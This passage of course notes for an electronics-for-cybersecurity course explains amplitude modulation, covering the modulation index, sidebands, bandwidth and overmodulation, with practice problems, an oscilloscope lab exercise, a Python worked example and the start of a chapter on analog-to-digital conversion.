PART III: IT'S A WRAP!
□ Unplug and stow the banana plug cables.
□ Turn off your oscilloscope.
□ Turn off your function generator.
□ Pat yourself on the back for your cyber expertise.
Security Exercise 19 Answer Sheet
Name: __________________________________________________________________________________________

Question 1 (manual method), vm(t) (CH1):
   Peak-to-peak (Vpp): __________
   Amplitude (Vm): __________
   Period (Tm): __________
   Frequency (fm): __________

Question 2 (cursor method), vm(t) (CH1):
   Peak-to-peak (Vpp): __________
   Amplitude (Vm): __________
   Period (Tm): __________
   Frequency (fm): __________

Question 3 (automatic method), vm(t) (CH1):
   Peak-to-peak (Vpp): __________
   Amplitude (Vm): __________
   Period (Tm): __________
   Frequency (fm): __________

Question 4:
   vm(t) = ____________________________________ (Show values)

Question 5:

Question 6:
   __________________________________ Instructor / Lab Tech

Question 7:
   Amplitude: __________
   Frequency: __________
   ___________________ Instructor / Lab Tech

Question 8:
   Amplitude: __________
   Frequency: __________
   ____________________ Instructor / Lab Tech
Chapter 20: Intro to Modulation
Objectives:
(a) Define the term baseband signal and describe some potential limitations associated with transmitting baseband signals
directly.
(b) Discuss the role of modulation in signal transmission and the methods of modulating a sinusoidal carrier.
(c) Using a plot of an AM signal, determine Vmax, Vmin, Vm, Vc and m.
(d) Create a frequency plot for and determine the sidebands and bandwidth of an AM signal where the information signal
consists of one or more distinct sinusoids.
(e) Determine the condition for overmodulation in an AM signal, and the consequence of overmodulation.
Connection to Cyber Security
In Chapter 19, we defined a communications system and learned that the wireless section of EC310 will focus on
communications in which the communication channel is free space.
We also learned that in order to send any information through a communications system it must be in the form of a signal
(which is the name given to the function that conveys our information), and if our communication channel is free space, it
means we’re dealing with signals carried in the Electromagnetic Spectrum (EM). Finally, we learned that signals can be
represented as a function of either time or frequency. Wireless channels have different vulnerabilities than we saw in the host
section of the course, because of the frequency of transmission. It is possible that a wireless network can be attacked like we
saw in the networks section of the course, but to see how such a cyber attack can be carried out on a wireless network or a
wireless communication in general, you must first understand how information is carried through the wireless channel.
1. Baseband Signals
If you’re sitting in your EC310 classroom in the basement of Rickover Hall and you speak to the student next to you, will that
person be able to hear you? Will you be heard across the room? How about at the end of that loooong Rickover
passageway? Does anyone in Bancroft have a chance of hearing what you’re grumbling about in your EC310 classroom?
Why not? Your voice doesn’t travel as far as you might like it to—your voice creates pressure waves in the air, and the
strength of these waves attenuates over distance. The louder you yell the farther you’ll be heard, but this of course has its
limits. As an alternative to walking around screaming all day, you might consider speaking at a more normal volume into a
microphone. A microphone is a device that transforms sound pressure waves into electrical signals. You could then send the
electrical output of the microphone to an antenna. Then your voice frequencies would travel as electromagnetic waves
(“radio waves”), and as long as you provided enough power to the antenna, you could presumably greatly extend the
geographic range of your EC310 musings. In this chapter, we’ll see that the latter approach is on the right track, but in order
to be practical, it requires a bit more finesse.
In this example our voice signal, which you’ll recall is comprised of frequencies roughly in the range between 300 Hz and 3
kHz, is what we call a baseband signal. Baseband signals are information signals at their original frequencies, typically low
frequencies. To transmit a baseband signal directly as is, we use baseband transmission…as you’ll see in shortly,
communication systems typically will upshift the frequency spectrum of baseband signals to a higher range of frequencies to
allow transmission through the atmosphere.
In general, before signals can be transmitted effectively, they must first be converted to a form that is compatible with the
communication medium. One facet of this conversion is transducing the signal from its natural physical form into an electrical
signal. For example,
• Microphones convert acoustic pressure waves (sound) into electrical signals.
• Video cameras convert light patterns into electrical signals.
• Computer keyboards convert physical input (typing) into electrical signals.
But, as alluded to above, even after converting your voice signal to, say, a voltage signal using a microphone, attempting to
transmit it over the air as a baseband signal is impractical. Why? Let’s look at an example that will point us in the right
direction.
Practice Problem 20.1
Physics dictates that antenna length is intrinsically tied to the wavelength of the signal it is transmitting or receiving. To transmit
a signal through the atmosphere with an antenna efficiently, the length of the antenna must be at least a tenth of a wavelength
long.
What is the approximate length of the antenna required to transmit the sound of a tuning fork (which creates musical note A =
440 Hz)? Note: this sound must be transduced into an electrical signal first before it is transmitted.
Wait! To transmit that lousy tuning fork signal my antenna needs to be at least 68 km? That’s over 42 miles! We’d need an
antenna that extends into the upper parts of the atmosphere for that. Clearly, that’s not going to work.
Well, I know that if I want to listen to the Navy game on the radio (because for some
reason I avoided the mandatory fun), I can tune in to AM radio station 1430 WNAV.
Recall that from Chapter 19, when referring to a commercial AM radio station, such as
1430 WNAV, that the 1430 refers to the center of its transmission frequency in kHz.
So what size antenna does WNAV use?
Practice Problem 20.2
(a) What is the wavelength of an AM radio station whose transmission frequency is 1430 kHz?
(b) What is the approximate antenna length if the station uses an antenna that is half the wavelength long?
105 meters? Okay, that’s still big – it’s about 115 yards - almost an entire football field… but at least you don’t need an
antenna that reaches into outer space now. In reality, WNAV’s antenna, pictured at right, is 117 meters. We’re close!
The purpose of those two examples was to demonstrate that we need to somehow get our baseband information to a higher
frequency (shorter wavelength) in order to be able to transmit it across our channel. Higher frequencies give us reasonable
antenna sizes plus some added benefits: first, signals will attenuate less quickly if the higher frequencies are well-chosen.
Second, multiple people, whose voices all occupy the same baseband frequencies, can communicate without interfering if each
transmits on a different higher frequency range. We can shift baseband information to higher frequencies for transmission
using a process called modulation.
2. Modulation
To overcome limitations of the communications channel and permit multiple access, information signals are impressed upon
a higher-frequency carrier signal for transmission. This process is called modulation. Now we’re dealing with two signals:
1. Original (“baseband”) information signal - frequency is too low to transmit efficiently
2. Higher frequency (“carrier”) signal - we can transmit this efficiently, so we use it to carry our information
Mathematically, the sine wave representing the higher-frequency carrier is given by:
$v_c(t) = V_c\sin(2\pi f_c t + \theta)$
Modulation is the process of varying any of three properties (amplitude, frequency or phase) of a high-frequency carrier using
the lower-frequency information signal (baseband signal). A modulator is a component of a communication system which
achieves modulation. The three types of modulation we will focus on are:
• Amplitude modulation (AM) – Varying the amplitude Vc of the carrier with the info signal.
• Frequency modulation (FM) – Varying the frequency fc of the carrier with the info signal.
• Phase modulation (PM) – Varying the phase angle of the carrier with the info signal.
Since the intention of the “Wireless” section of EC310 is to give you a broad understanding of wireless communication
techniques rather than to make you communication engineers, we’re only going to go into more detail with amplitude
modulation (AM) in this chapter. This is NOT to say that frequency modulation and phase modulation are unimportant –
they’re very important and very widely used. The fact is that there’s only so much modulation that can be reasonably covered
in the last several chapters of this course, and AM is the easiest to visualize and demonstrate. Later, in Chapter 22: Digital
Modulation, we will again address amplitude, frequency and phase modulation to some extent as they apply to digital
communications.
3. Amplitude modulation (AM)
In amplitude modulation, the information signal is used to vary the amplitude of the carrier sine wave. For simplicity,
consider a sine wave information signal, vm(t) (a 440 Hz tuning fork) and a sinusoidal carrier, vc(t) (frequency 5000 Hz (5
kHz)).
$v_m(t) = V_m\sin(2\pi f_m t) = V_m\sin(2\pi\,440t)$
The diagram of an amplitude modulation system using this information signal follows.
The AM wave (vAM(t)) is the product of the carrier (with amplitude = 1) with a modulating signal. The modulating signal is
the information signal vm(t) with an added offset, Vc. The AM signal is then given by:
$v_{AM}(t) = (V_c + V_m\sin(2\pi f_m t))\sin(2\pi f_c t)$
In the figure below, the top plot is of the information signal and the bottom is the resulting AM signal. Note that the
information signal starts at a value of zero (for approximately 2 msec), so the resulting AM signal is the unmodulated carrier
signal (meaning that the carrier is not being modulated). When the information signal is no longer zero, it starts to modulate
the carrier’s amplitude as shown. The horizontal axes are time in msec. The information signal is equal to zero at the
beginning, then changes to the tuning fork sine wave at approximately 2 msec. Here, the carrier and information signal
parameters are: fc = 5 kHz, Vc = 10V, fm = 440 Hz, Vm = 7.5V.
A zoomed-in plot of the resulting modulated AM signal is as follows, showing the graphical relation between Vm and Vc:
The envelope of the modulating signal (which is drawn onto the AM signal below in a dashed red line) varies above and
below the unmodulated carrier amplitude, Vc. It is the envelope that carries the information signal; the receiver must separate
the envelope from the received AM signal to recover the information that was transmitted. In this case, the envelope is in the
shape of a sine wave, which is the same as the information signal. The values of Vm and Vc are related by the modulation
index (m).
Modulation Index
The relationship between the information signal amplitude, Vm , and the unmodulated carrier amplitude, Vc , is expressed as a
ratio called the modulation index (m), defined as:
$m = \dfrac{V_m}{V_c}$
Sometimes m is expressed as a percentage: percent modulation = m x 100%. The following figure shows the AM signal at
three different values of percent modulation: 20%, 50% and 90%. Overall, the greater the value of m, the closer the envelope
gets to the horizontal (time) axis.
We can also mathematically determine the modulation index m from the maximum and minimum values of the envelope of
vAM(t) as follows, where Vmax is the maximum value of the envelope and Vmin is the minimum value:
$V_m = \dfrac{V_{max} - V_{min}}{2}$
$V_c = \dfrac{V_{max} + V_{min}}{2}$
$m = \dfrac{V_m}{V_c} = \dfrac{V_{max} - V_{min}}{V_{max} + V_{min}}$
In order for the AM signal to convey the original signal accurately and prevent distortion, the information signal amplitude
(Vm) must be less than the unmodulated carrier signal amplitude (Vc). Here again, the unmodulated carrier refers to the AM
signal if the information signal amplitude is equal to 0 (Vm = 0), in which case $v_{AM}(t) = V_c\sin(2\pi f_c t)$. The maximum usable
modulation index is m = 1.0, corresponding to 100% modulation, when Vm is equal to Vc. When Vm is greater than Vc (that is,
m > 1), overmodulation occurs. Overmodulation, depicted below, results in distortion of the AM signal’s envelope, and since
the envelope holds the information, the recovered information signal is also distorted.
Practice Problem 20.3
If a carrier signal $v_c(t) = 9\sin(2\pi\,5000t)$ Volts is modulated by a sine wave $v_m(t) = 7.5\sin(2\pi\,440t)$ V, what is the percentage
modulation of the resulting AM signal?
Now that we have a basic understanding of how Amplitude Modulation works in the time domain, let’s look at AM in the
frequency domain.
4. AM in Frequency Domain
Recall the equation for the amplitude modulated waveform if the information signal is a single sine wave is given by:
$v_{AM}(t) = (V_c + V_m\sin(2\pi f_m t))\sin(2\pi f_c t)$. We already know the frequency domain representations of the modulating
signal (vm(t)) and the carrier signal (vc(t)), but how does the amplitude modulated signal look in the frequency domain?
To answer this question, recall the trig identity for the product of two sine waves:
$\sin A\sin B = \tfrac{1}{2}\cos(A - B) - \tfrac{1}{2}\cos(A + B)$
Applying this trig identity for product of two sine waves to the AM signal results in:
$v_{AM}(t) = (V_c + V_m\sin(2\pi f_m t))\sin(2\pi f_c t)$
$= V_c\sin(2\pi f_c t) + V_m\sin(2\pi f_c t)\sin(2\pi f_m t)$
$= V_c\sin(2\pi f_c t) + \dfrac{V_m}{2}\cos(2\pi(f_c - f_m)t) - \dfrac{V_m}{2}\cos(2\pi(f_c + f_m)t)$
This means that when a single sine wave information signal is used to modulate the carrier in AM, the resulting AM signal
contains three sinusoids: one at the carrier frequency, one fm Hz below carrier frequency, and one fm Hz above the carrier
frequency. For the tuning fork example, we have: fc = 5 kHz, fc − fm = 4.560 kHz and fc + fm = 5.440 kHz. The trig identity puts
the amplitudes at frequencies fc − fm and fc + fm at one half that of Vm.
This means the resulting frequency domain plot for this tuning fork example looks like the following (note that the plot
shows the magnitude of the frequency content, so the negative cosine amplitude shows up as positive-going spikes on the
plot):
The process of modulating a carrier creates an upper and a lower sideband that is apparent in the frequency plot. The lower
sideband (or LSB) is that portion of the transmitted signal that has frequency content less than the carrier frequency, and the
upper sideband (or USB) has frequency content greater than the carrier frequency. For the tuning fork example, the USB is
the 5440 Hz cosine, and the LSB is the 4560 Hz cosine. On a frequency plot of an AM signal, the lower sideband is a mirror
image of the upper sideband centered about the carrier frequency.
What is the AM signal’s bandwidth? Since bandwidth is the highest transmitted frequency minus the lowest frequency
transmitted, it is (fc + fm) − (fc − fm) = 2 fm = 880 Hz. This is twice the bandwidth of the information signal we started with…if
we didn’t modulate the information signal, the transmission bandwidth would have only been fm (440 Hz in this case) [2]. This
means that by transmitting with AM, we have doubled the required bandwidth to transmit the signal. Why is this a concern?
Bandwidth is the #2 limiting factor in communications systems, and can be expensive to use… so we’re going to want to
send as much information as possible while occupying the minimum amount of bandwidth possible.
Let’s look at a slightly more complex example – suppose the information signal was comprised of two sine waves:
$v_m(t) = V_1\sin(2\pi f_1 t) + V_2\sin(2\pi f_2 t)$
What does the AM signal look like? Again, we apply the same trig identity to each sine in the information signal, resulting in:
$v_{AM}(t) = (V_c + v_m(t))\sin(2\pi f_c t)$
$= (V_c + V_1\sin(2\pi f_1 t) + V_2\sin(2\pi f_2 t))\sin(2\pi f_c t)$
$= V_c\sin(2\pi f_c t) + V_1\sin(2\pi f_c t)\sin(2\pi f_1 t) + V_2\sin(2\pi f_c t)\sin(2\pi f_2 t)$
$= V_c\sin(2\pi f_c t) + \dfrac{V_1}{2}\cos(2\pi(f_c - f_1)t) - \dfrac{V_1}{2}\cos(2\pi(f_c + f_1)t) + \dfrac{V_2}{2}\cos(2\pi(f_c - f_2)t) - \dfrac{V_2}{2}\cos(2\pi(f_c + f_2)t)$
The net result is that for each sine in the message, we will wind up with two cosines in the AM signal: one will have a
frequency greater than the carrier frequency, one will have a frequency less than the carrier frequency. The bandwidth is still
equal to the highest frequency in the AM signal minus the lowest frequency. This is equal to two times the max frequency in
the information signal. That is, if fmax is the maximum of the two frequencies in the information signal (either f1 or f2), then
the AM bandwidth is BW = 2 fmax.
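To tie the modulation-index material of section 3 and the frequency-domain derivation above together, here is an added worked example in Python (not part of the EC310 notes): it lists the spikes of the AM frequency plot for any sum-of-sines information signal, computes BW = 2 fmax, recovers Vm, Vc and m from the envelope's Vmax and Vmin, and checks numerically that the product form of vAM(t) equals the carrier-plus-sidebands form derived above. The function names and the constructed sample tones are this example's own; the tuning-fork values (Vc = 10 V, fc = 5 kHz, Vm = 7.5 V, fm = 440 Hz) come from the chapter.

```python
import math

# Added example (not from the EC310 notes): AM spectrum, bandwidth and
# modulation index for a carrier Vc sin(2*pi*fc*t) modulated by a sum of
# sine-wave tones. Function names and sample values are this example's own.


def am_spectrum(Vc, fc, tones):
    """Frequency-plot spikes (Hz, volts) of vAM(t) = (Vc + vm(t)) sin(2*pi*fc*t).

    tones is a list of (Vk, fk) pairs describing vm(t) = sum Vk sin(2*pi*fk*t).
    By sinA sinB = 1/2 cos(A-B) - 1/2 cos(A+B), each tone gives a lower
    sideband at fc - fk and an upper sideband at fc + fk, both of magnitude
    Vk/2 (the minus sign disappears on a magnitude plot).
    """
    spikes = [(fc, Vc)]                       # the carrier itself
    for Vk, fk in tones:
        spikes.append((fc - fk, Vk / 2))      # lower sideband (LSB)
        spikes.append((fc + fk, Vk / 2))      # upper sideband (USB)
    return sorted(spikes)


def am_bandwidth(tones):
    """Transmission bandwidth: (fc + fmax) - (fc - fmax) = 2 * fmax."""
    fmax = max(fk for _, fk in tones)
    return 2 * fmax


def envelope_parameters(Vmax, Vmin):
    """Recover Vm, Vc and m from the envelope's maximum and minimum values."""
    Vm = (Vmax - Vmin) / 2
    Vc = (Vmax + Vmin) / 2
    m = Vm / Vc                                # equals (Vmax - Vmin)/(Vmax + Vmin)
    return Vm, Vc, m


def is_overmodulated(Vm, Vc):
    """m > 1 (Vm > Vc): the envelope, and so the recovered message, is distorted."""
    return Vm / Vc > 1


def v_am(Vc, fc, tones, t):
    """Time-domain AM signal in product form, (Vc + vm(t)) sin(2*pi*fc*t)."""
    vm = sum(Vk * math.sin(2 * math.pi * fk * t) for Vk, fk in tones)
    return (Vc + vm) * math.sin(2 * math.pi * fc * t)


def v_am_expanded(Vc, fc, tones, t):
    """The same signal written as carrier plus sideband cosines (after the identity)."""
    v = Vc * math.sin(2 * math.pi * fc * t)
    for Vk, fk in tones:
        v += (Vk / 2) * math.cos(2 * math.pi * (fc - fk) * t)
        v -= (Vk / 2) * math.cos(2 * math.pi * (fc + fk) * t)
    return v


def max_mismatch(Vc, fc, tones, n_samples=2000, duration=0.01):
    """Largest |product form - expanded form| over n_samples points in [0, duration) s."""
    dt = duration / n_samples
    return max(abs(v_am(Vc, fc, tones, i * dt) - v_am_expanded(Vc, fc, tones, i * dt))
               for i in range(n_samples))


if __name__ == "__main__":
    # Tuning-fork example from the chapter: Vc = 10 V, fc = 5 kHz, Vm = 7.5 V, fm = 440 Hz
    tones = [(7.5, 440)]
    for f, mag in am_spectrum(10, 5000, tones):
        print(f"{f:6.0f} Hz  {mag:5.2f} V")
    print("bandwidth:", am_bandwidth(tones), "Hz")
    # Envelope of that same signal: Vmax = Vc + Vm = 17.5 V, Vmin = Vc - Vm = 2.5 V
    Vm, Vc, m = envelope_parameters(17.5, 2.5)
    print(f"Vm={Vm} V  Vc={Vc} V  m={m:.2f}  overmodulated={is_overmodulated(Vm, Vc)}")
    # Constructed two-tone message to check the derivation numerically
    print("max mismatch between forms:", max_mismatch(10, 5000, [(7.5, 440), (3, 1100)]))
```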
Practice Problem 20.4
Suppose we want to transmit the sound of a two chime doorbell (f1=349 Hz, f2= 440 Hz) using VLF (very low frequency)
communications (let fc = 20 kHz). Each of the chimes has an amplitude of 10V, and the carrier’s amplitude is 20V. Sketch the
frequency domain representation of the transmitted signal and determine the bandwidth.
Which of the two chime frequencies determines the bandwidth?
[2] The bandwidth of a baseband signal is considered to be its maximum frequency content. In this case, if the message is a single sinusoid at
a frequency of fm Hz, we say its bandwidth is fm Hz.
Practice Problem 20.5
If a carrier signal $v_c(t) = 20\sin(2\pi\,5000t)$ Volts is amplitude modulated by information signal
$v_m(t) = 4\sin(2\pi\,200t) - 6\cos(2\pi\,400t + 4\pi/11)$, sketch the frequency plot for the resulting AM signal and calculate the
transmission bandwidth.
An example of an even more complicated signal is the signal created by recording an oboe (the musical instrument) playing a
single note. When someone blows into the mouthpiece of an oboe to play a note, their fingers are placed over certain holes to
create the note. Because of the structure of the oboe (its length, diameter and placement of the holes for example), the sound
the instrument makes is actually a combination of a number of tones (sinusoids) with different amplitudes. Different
instruments can all play the same note, but each instrument will sound differently because the structure of the instrument
produces different sinusoids with different amplitudes. Amplitude modulation of an oboe playing the note Concert A is
demonstrated on the next figure. In this figure, the maximum frequency present in the note is approximately 4 kHz, so the
bandwidth of the AM signal is BW = 2 fmax = 2 (4 kHz)= 8 kHz.
Other common information signals, such as voice or music, are composed of many different frequencies. AM modulation still
works the same way, but in order to compute transmission bandwidth, we again compute it as BW = 2 fmax. Again, here, fmax
is the maximum frequency content present in the information signal.
5. Demodulation
Modulation is used to upshift the frequency content of a baseband signal, to facilitate transmission (e.g., to allow a smaller
antenna). Demodulation is performed in the receiver to downshift that frequency content back to its baseband frequency. For
example, if the 440 Hz tuning fork signal were transmitted on Annapolis AM radio station WYRE 810AM (fc = 810 kHz), the
transmitted signal is at a frequency of approximately 810 kHz, which is well outside our hearing (we can hear signals with
frequency content up to approximately 20 kHz). In order to hear the tuning fork signal, our car’s radio receiver must shift the
frequency content back down to its original range (440 Hz). This is demodulation; it basically “undoes” what modulation did
to the information signal. How demodulation works is beyond the scope of this course, but you should be aware of its
importance in a communication system.
What’s the point? AM is by no means the only form of modulation (though it’s probably the easiest to work through and
visualize). The intent of this course is not to make you all communications engineers, but you do need to have enough
background in modulation to understand the implications (especially with regard to bandwidth) moving forward. You’ll see
this again in a few lessons, with digital applications.
Problems
1.
(a) Calculate the wavelength of signals with frequencies of 1.5 kHz, 18 MHz, and 22 GHz.
(b) Since an antenna that is needed to transmit these frequencies must be at least a tenth of the wavelength, which signal
frequency would NOT be practical for direct (i.e., baseband) transmission?
(c) Name and define a technique that could be used to transmit the frequency in part (b).
2. An AM signal is comprised of the following two signals:
vm(t) = 80 cos (2π5000t) volts
vc(t) = 100 cos (2π800,000t) volts
where vm(t) is the message and vc(t) is the “unmodulated carrier” (i.e., the output of the modulator when no
information signal is present).
(a) Find the carrier frequency, the upper-sideband and lower-sideband frequencies, and the percent modulation (m).
(b) Suppose vm(t) changes to 120 cos(2π5000t). Find the new percent modulation (m). Give the technical term for this
condition and explain the effects of this condition occurring.
3.
A radio station, 1280AM, is conducting a monthly test of the Emergency Alert System. The test begins with an
annoying sound comprised of two pure tones at 853 Hz and 960 Hz. The signal being broadcast has exactly five
frequency components, i.e., the signal could be written as follows:
vAM(t) = V1 sin(2π f1 t) + V2 cos(2π f2 t) - V3 cos(2π f3 t) + V4 cos(2π f4 t) - V5 cos(2π f5 t) volts
(a) Find the five frequencies that comprise the AM signal being broadcast. Recall that the carrier frequency and the two
sideband frequencies for each of the emergency alert tones will be involved.
(b) Find the bandwidth for this particular broadcast.
(c) Determine which of these two emergency alert tones (853 Hz or 960 Hz) determines the bandwidth.
(d) What is the bandwidth assigned to a commercial AM radio station in the United States?
4.
Musical notes can be viewed as pure tones (if we ignore the “warmth” added by any particular instrument). Pure tones
are signals that contain only one frequency. Chords are combinations of notes, such as the C-Major chord on the piano,
comprised of notes C, E, and G.
If the radio station 1280AM broadcasts the C-Major chord, it would broadcast the following seven frequencies, listed in
ascending order and annotated by note and sideband:
f LSB-G = 1,279,608 Hz
f LSB-E = 1,279,670 Hz
f LSB-C = 1,279,738 Hz
f carrier = 1,280,000 Hz
f USB-C = 1,280,262 Hz
f USB-E = 1,280,330 Hz
f USB-G = 1,280,392 Hz
Notice that in the lower sideband, the notes are in reverse order. G, the highest pitch in the chord, is always the
farthest away from the carrier frequency. The carrier frequency is exactly in the middle. Assume that the carrier
amplitude is 100V, and the voltages for the three musical notes are all 20V.
(a) Sketch this broadcast in the frequency domain (label frequencies and amplitudes).
(b) After demodulation, what frequencies would be heard coming out of your AM radio’s speaker?
(c) Find the bandwidth of the broadcast and determine which note (C, E, or G) sets the bandwidth.
5. For the following plots of AM signals, determine Vmax, Vmin, Vc, Vm and m. Show your work!
(a) [Plot: AM signal, −15 to 15, vs. time (msec), 0 to 5 msec]
(b) [Plot: AM signal, −20 to 20, vs. time (msec), 0 to 2.5 msec]
(c) [Plot: AM signal, −15 to 15, vs. time (msec), 0 to 5 msec]
(d) [Plot: AM signal, −20 to 20, vs. time (msec), 0 to 2.5 msec]
6.
Determine fc and fm for any of the AM signals in problem 5 (parts (a)-(d)). (Hint: fc and fm are the same for each case).
Using these values of fc and fm, along with your answers to problem 5, sketch the frequency content for each of these AM
signals (parts (a)-(d)).
7.
For any of the plots shown in problem 5, determine the bandwidth of the transmission. Note that each of these AM
signals has a single sinusoid as the information signal. (Hint: the bandwidth is the same for each case).
Security Exercise 20
Introduction to Amplitude Modulated Signals
PART I: SET UP
Check-off each step as you complete it.
Step One: Function generator setup.
□ Turn on power to the lab bench (the switch on the right that says "120V OUTLETS.")
□ Turn on the function generator.
□ Select the sinusoidal function by pressing the button with the Sine wave on it. The function generator display should indicate a small sine wave.
□ Turn any other lit buttons off.
□ Select the Utility function and Output Setup soft key. Load should be High Z.
□ Push Done.
□ Press the output button.
Step Two: Oscilloscope setup.
□ Turn on the oscilloscope.
□ Locate the CH 1 input on your oscilloscope. It will have a two-input (RED / BLACK) banana plug adaptor installed.
□ Connect banana plug cables (which can be found under the bench on the plastic Quad board) from the function generator’s output to the CH 1 input on the oscilloscope (red to red and black to black).
PART II: AMPLITUDE MODULATED SIGNAL IN THE TIME DOMAIN
An Amplitude Modulated (AM) signal looks somewhat like the figure that follows. This particular depiction includes the AM
signal’s envelope, and the definitions of Vm (message amplitude), Vc (carrier amplitude), Vmax (max envelope voltage) and
Vmin (min envelope voltage). The information signal (message) modulates the amplitude of the carrier.
□ On the Function Generator select the Store/Recall button and then push Recall State and then push State 3 and then Recall State again. Make sure the output button is lit.
□ Push AUTOSET on the Oscilloscope and you will see an AM signal.
□ Press CH 1 MENU on the oscilloscope and make the following settings.
  - Coupling: AC
  - BW Limit: OFF
  - Volts/Div: COARSE
  - Probe: 1X
  - Invert: Off
□ If a trace appears for CH2, then press the CH2 Menu button twice to turn off the CH 2 trace, since nothing is connected to CH 2 for this lab.
□ With the CH 1 menu selected, adjust the position of the vertical axis zero level by rotating the position knob under the vertical section in the CH 1 column, so that the “1→” on the left side of the LCD is adjacent to the major horizontal axis (centered vertically on the display).
□ Adjust the vertical scale (Volts/Div) to enlarge the displayed signal so that it occupies more than half of the oscilloscope display.
□ Adjust the horizontal range (Sec/Div) so that you can see the AM waveform similar to the one shown on Figure 1 above. You may have to adjust the knob for trigger level (it is to the far right below the AUTOSET button) to clean up the signal. Turn the knob so that you see the trigger level (arrow to far right of screen) rise from the center line. Hint: if you have trouble removing the “jitter” from the graph, use the “Run/Stop” button in the upper right hand corner of the oscilloscope to pause the capture.
Once the display is properly adjusted, use the boxes on the oscilloscope to measure the following parameters. Record your
results in Question 1 on your answer sheet.
1.
Measure Vmin and Vmax (see Figure 1).
2.
Measure the period of the carrier, T carrier (higher frequency signal). You will have to adjust the horizontal
(sec/div) scale to accurately measure the period of a cycle of the high frequency carrier signal.
3.
Measure Tmessage, the period of the message (lower frequency signal). You will need to adjust back the
horizontal (sec/div). Note: T message measures the cycle of the wave that rides along the top of the carrier as the
carrier is modulated.
Calculate the modulation index m, the carrier frequency (fc), the message signal's frequency (fm), the amplitude of the carrier
(Vc) and the amplitude of the message signal (Vm). Use the equations shown in Table 1 below along with your measured
values. Record your results in Question 1 on your answer sheet.
Table 1

$V_m = \frac{V_{max} - V_{min}}{2}$

$V_c = \frac{V_{max} + V_{min}}{2}$

$m = \frac{V_m}{V_c} = \frac{V_{max} - V_{min}}{V_{max} + V_{min}}$

$f_c = \frac{1}{T_c}$

$f_m = \frac{1}{T_m}$

Question 2: Determine the equation of the AM waveform displayed on the oscilloscope. Write your answer on your answer
sheet using the form below, but with numerical values replacing A, B, C and D:

$v_{AM}(t) = [A + B \sin(2\pi C t)] \sin(2\pi D t)$
PART III: AMPLITUDE MODULATED SIGNAL IN THE FREQUENCY DOMAIN
Let’s look at the frequency spectrum of this signal. In class we manipulated the above equation to show us what frequencies
will show up in the frequency domain:
$v_{AM}(t) = V_c \sin(2\pi f_c t) + \frac{V_m}{2} \cos(2\pi (f_c - f_m) t) - \frac{V_m}{2} \cos(2\pi (f_c + f_m) t)$
There are 3 frequencies in the AM signal: the carrier and its 2 sideband frequencies. So let us try to see this signal in terms
of its frequency content. Again, the oscilloscope performs a fast Fourier transform (FFT) and displays the magnitudes of the
frequencies present in the signal vs. frequency, so the horizontal scale shows frequency instead of time. The y-axis will show
values in decibels, which can be ignored for this lab.
□ Press AUTOSET and you will see the options to display the signal in time or in frequency (FFT). (NOTE: If the FFT option does not appear when you press AUTOSET, then press the MATH MENU button.)
□ Push the button next to the FFT (or stay in FFT operation) and you will see spikes at specific frequencies.
□ Set the horizontal scale to read 12.5 kHz per division using the Sec/Div knob.
Question 3. Determine the value of the center and sideband frequencies. Use the Frequency cursor (recall that when using
the FFT to show frequency content, the source must be MATH, not CH 1 or CH 2, to use the frequency plot cursors).
Question 4. Sketch your frequency plot. Label the frequency axis with your values and have your instructor check it.
Question 5. What is the bandwidth of the amplitude modulated waveform?
Question 6. Rewrite your AM signal using the form below:
$v_{AM}(t) = A \sin(2\pi B t) + C \cos(2\pi D t) - E \cos(2\pi F t)$
filling in numerical values for A, B, C, D, E and F (different than the A-D above).
Question 7. Is this AM signal within the range of commercial AM radio frequencies?
Question 8. If the information signal from above contained many frequencies (including frequencies higher than the fm you
measured), how would this affect the bandwidth of the amplitude modulated waveform?
PART IV: ANOTHER AMPLITUDE MODULATED SIGNAL
You have a message signal you would like to transmit, but do not have access to an AM transmitter. An evil user offers to
transmit your signal (for a small fee). You pay the fee. Your customers start complaining that your signal sounds terrible.
You examine the amplitude modulated signal that the evil user has generated for you:
□ On the Function Generator select the Store/Recall button and then push Recall State and then push State 4 and then Recall State again. Make sure the output button is lit.
□ Push AUTOSET on the Oscilloscope and you will see an AM signal.
□ Eliminate the CH 2 signal (if necessary), vertically center the waveform and adjust the horizontal range and trigger level to stabilize the AM signal.
Question 9. Explain the problem with the evil user AM signal (hint: look at the shape of the envelope).
Security Exercise 20 Answer Sheet
Name:
__________________________________________________________________________________________
Question 1:
Vmax = ______  Vmin = ______  Vc = ______  Vm = ______  Tc (s) = ______  Tm (s) = ______  fc (kHz) = ______  fm (kHz) = ______  m = ______
__________________________________________________________________________________________
Question 2:
__________________________________________________________________________________________
Question 3: fc = ___________
flsb = _____________
fusb = _____________
__________________________________________________________________________________________
Question 4:
__________________________________
Instructor / Lab Tech
__________________________________________________________________________________________
Question 5:
__________________________________________________________________________________________
Question 6:
__________________________________________________________________________________________
Question 7:
__________________________________________________________________________________________
Question 8:
_________________________________________________________________________________________
Question 9.
__________________________________________________________________________________________
Chapter 21: Analog to Digital Conversion
Objectives:
(f) Provide examples of analog and digital communication systems.
(g) Describe the advantages of digital over analog communication.
(h) Discuss the basic steps of the analog-to-digital conversion process: sampling, and quantizing/encoding.
(i) Given an analog waveform, sampling rate, and resolution, determine the resulting quantized signal and the binary encoded
A/D output.
(j) Calculate the Nyquist sampling rate for an analog signal.
(k) Given the number of bits in an A/D process, and sample frequency, determine generated bit rate.
(l) Describe how the number of bits used in the A/D process affects the reconstructed analog signal.
Connection to Cyber Security
In Chapter 20, you learned about modulation, and that it is impractical to transmit signals at baseband frequencies through
free space. Modulation upshifts the frequency of transmission, to allow for smaller antennas. For an AM communication
system, the signals at various places in the system are shown below.
We could have also used FM or PM, in which case the signal that exists in the communication channel (free space) might look
like the following, depending on the information signal (left: frequency modulation, right: phase modulation).
In a digital communication system, the information is composed of 1s and 0s, and the information signal is composed of voltage
pulses that represent the 1s and 0s. Hackers can attack our system in a number of ways, such as “reading our mail” or injecting
their own information into our channel. In the digital age, cyber attacks usually fall onto digital communication systems. But
where do the 1s and 0s come from? Chapter 21 deals with how 1s and 0s are created from an analog signal.
1. Analog Systems.
When you look at the waveform below, you should notice that it is a signal that varies continuously in time and amplitude. If
we observed nature, we would see that nature produces signals like this (i.e., changes in pressure, variations in light, sounds,
etc.). Analog systems use analog electrical signals to represent these natural patterns, such as the voltage signal created from
the sound waves of a person speaking into a microphone, shown in the next figure.
What do you think might be an example of an analog system in action? How
about an 8-track tape player playing the songs on Michael Jackson’s 8-track
album, Thriller.
This is a great example of an analog system, but my guess is you have no idea
what an 8-track is. So, let’s list some other analog systems that may ring a
bell: AM/FM radios, rotary telephones, cassette tape players, VCRs, broadcast
